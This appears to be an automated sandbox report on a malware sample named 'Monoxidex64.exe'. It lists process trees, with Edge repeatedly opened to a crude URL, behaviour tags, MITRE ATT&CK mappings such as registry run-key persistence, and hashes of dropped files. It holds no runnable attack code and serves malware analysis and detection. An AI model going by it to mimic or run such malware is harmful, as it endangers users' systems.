      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
      4⤵
      PID:5784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
      4⤵
      PID:5796
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
      4⤵
      PID:6028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
      4⤵
      PID:5492
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
      4⤵
      PID:1408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:1
      4⤵
      PID:5552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://dickpics.com/
    3⤵
    PID:5576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc494d3cb8,0x7ffc494d3cc8,0x7ffc494d3cd8
      4⤵
      PID:5588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://dickpics.com/
    3⤵
    PID:4972
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc494d3cb8,0x7ffc494d3cc8,0x7ffc494d3cd8
      4⤵
      PID:3264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc330bcc40,0x7ffc330bcc4c,0x7ffc330bcc58
  2⤵
  PID:1412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1772,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1748 /prefetch:2
  2⤵
  PID:860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2112,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2124 /prefetch:3
  2⤵
  PID:3440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2216,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:8
  2⤵
  PID:2764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:2384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:1104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3668 /prefetch:1
  2⤵
  PID:3472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4620,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:8
  2⤵
  PID:2712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4612,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:8
  2⤵
  PID:728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4792 /prefetch:8
  2⤵
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4828,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4648 /prefetch:8
  2⤵
  PID:764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4680,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:1
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4904,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3408,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:1916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4436,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3496 /prefetch:1
  2⤵
  PID:1016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4560,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5420 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4496,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3492 /prefetch:1
  2⤵
  PID:2448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5772,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5096 /prefetch:8
  2⤵
  PID:1596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3392,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:3420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3328,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3788 /prefetch:1
  2⤵
  PID:5580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5264,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5896 /prefetch:1
  2⤵
  PID:5656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6076,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5872 /prefetch:8
  2⤵
  PID:1940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6148,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6172 /prefetch:8
  2⤵
  PID:5916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5256,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4736 /prefetch:1
  2⤵
  PID:5372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=3428,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6088 /prefetch:1
  2⤵
  PID:1348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=4808,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:1
  2⤵
  PID:5288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3336,i,17093377651033359093,3791934640840815109,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5200 /prefetch:8
  2⤵
  PID:1848

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2660

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:748

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3680
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Monoxidex64.exe.vir"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4728
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3336
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DA623B638C315C46FADAB20AA330A335 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3944
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=97E1CB2D1FC30A1D9D199D8012D7FD07 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=97E1CB2D1FC30A1D9D199D8012D7FD07 --renderer-client-id=2 --mojo-platform-channel-handle=1784 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:4312
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C10AF9273BA980EA19DFB0AFA0322FA0 --mojo-platform-channel-handle=2356 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:2912
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8AB6D1C8FA9AB353FFF01751891653B3 --mojo-platform-channel-handle=1968 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:1492
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B6C97968978492CE4EDE356B2D7169BD --mojo-platform-channel-handle=2420 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:1568

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1360

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004E8
1⤵
PID:3700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

Filesize
24KB

MD5
87c2b09a983584b04a63f3ff44064d64

SHA1
8796d5ef1ad1196309ef582cecef3ab95db27043

SHA256
d4a4a801c412a8324a19f21511a7880815b373628e66016bc1785a5a85e0afb0

SHA512
df1f0d6f5f53306887b0b16364651bda9cdc28b8ea74b2d46b2530c6772a724422b33bbdcd7c33d724d2fd4a973e1e9dbc4b654c9c53981386c341620c337067

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

Filesize
72KB

MD5
2f6f1f80c4ed1fd57f214bf40a885a57

SHA1
0287e82d5044c01ea99f69ab02673fe8262bb9b4

SHA256
422596b36956a2800b4dbdc3c81acc6e960c73bbc373653a471d713ff7098d68

SHA512
06fc97aa33a16b411d601f61b308c5e34f984eeb10acb752dc909b591feac285c4ab313571c70e70d2a81441bac1fde4272fd4536fc2f13ffd683d8efcc90129

Download Submit
